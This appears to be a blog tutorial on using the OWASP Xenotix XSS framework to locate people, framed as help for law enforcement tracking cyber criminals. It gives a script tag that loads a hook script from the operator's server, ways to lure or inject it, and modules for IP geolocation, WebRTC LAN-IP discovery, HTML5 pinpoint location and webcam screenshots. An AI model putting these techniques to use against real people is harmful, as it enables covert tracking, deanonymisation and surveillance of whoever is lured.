Today I will discuss a few methods that law enforcement agencies can use to track down cyber criminals. The methods discussed here include approximate triangulation as well as pinpoint location (which depends on social engineering and user interaction).
Requirement
Cyber criminals obviously have a presence on the internet. Let's refer to the cyber criminal as the victim throughout this post. Most of the methods I discuss here do not require victim interaction, except for the social engineering method.
All the methods require the victim to visit a URL in order to track him/her successfully.
Methods
The methods I describe here make use of the OWASP Xenotix XSS Exploit Framework. Xenotix is an Advanced Cross Site Scripting Detection and Exploitation Framework. However, we can also leverage some features of OWASP Xenotix to track down a cyber criminal.
Step 1
Craft a xooked URL with Xenotix or inject the Xenotix xook script into any page.
This tutorial requires the latest version of OWASP Xenotix. Get v6.1 from here: xenotix.in
Open Xenotix, go to Settings -> Configure Server
Give a public IP that is exposed to the internet. For the sake of the demo I will be using a LAN IP in a virtual environment. Give any port number and run the server.
Now you can either give your victim the xook URL, which is http://192.168.56.1:5005/xook.html, or inject the xook script (<script src="http://192.168.56.1:5005/xook.js"></script>) into some fancy-looking page.
Step 2
Think about how you can make your victim visit a URL. There are a couple of ways:
1. Send him an Email with the URL and convince him to visit it.
2. Send him the URL itself and convince him to visit it.
3. Leverage XSS vulnerabilities in a website visited by the victim.
And a lot more ways, depending on your creativity and imagination.
Step 3
There are a couple of modules in Xenotix that will help you track a victim.
Using IP2Geolocation Module
Go to Information Gathering -> Victim Fingerprinting -> IP2Geolocation
This module gives the approximate location of the victim. Once you click the Fingerprint button, you will get a response like this, which shows a lot of information about the victim.
Using IP2Location Module
Go to Information Gathering -> Victim Fingerprinting -> IP2Location
This module is a bit more accurate but requires the victim to allow pop-ups in the browser. Click on the Fingerprint button and you will get the following information about your victim.
Check out this video on YouTube to get familiar with these
modules.
Using the Network IP (WebRTC) Module
Go to Information Gathering -> Network -> Network IP (WebRTC)
Suppose you have identified the public IP of the victim, which, for example, belongs to an Internet cafe network. You need to identify which machine the attack is coming from. The Network IP module in Xenotix will get you the exact LAN IP of the victim's system. Clicking on Inject will return the LAN IP of the victim.
Using Geolocation HTML5 API
Go to XSS Exploitation -> Social Engineering -> HTML5 Geolocation API
This module will give you the pinpoint location of the victim. However, this module requires victim interaction. The downside of this method is that the browser will show the victim a pop-up saying that the site wants to get his location.
This basically tests the common sense of the victim, so the result is not guaranteed. Once you click on Inject and the victim allows the API to execute, you will get his exact location.
Using Live WebCam Screenshot Module
Go to XSS Exploitation -> Social Engineering -> Live WebCam Screenshot
This module also depends on the common sense of the victim. If he accepts the webcam request pop-up from the browser and has a webcam connected to his system, you will get an idea of what he looks like.
Once you click on Inject and the victim allows sharing of the webcam, you will get screenshots from the webcam.
Conclusion
Most of the methods rely on the victim's IP. If the victim's IP is not real, then these methods are pretty much useless. Modern cyber criminals are intelligent enough to use sophisticated proxies to hide their identity. But law enforcement agencies and detectives can still give these methods a try. After all, it depends a lot on common sense!
NOTE: Use the latest version of OWASP Xenotix; old versions have a few bugs that were addressed in the new version.
Happy Hacking!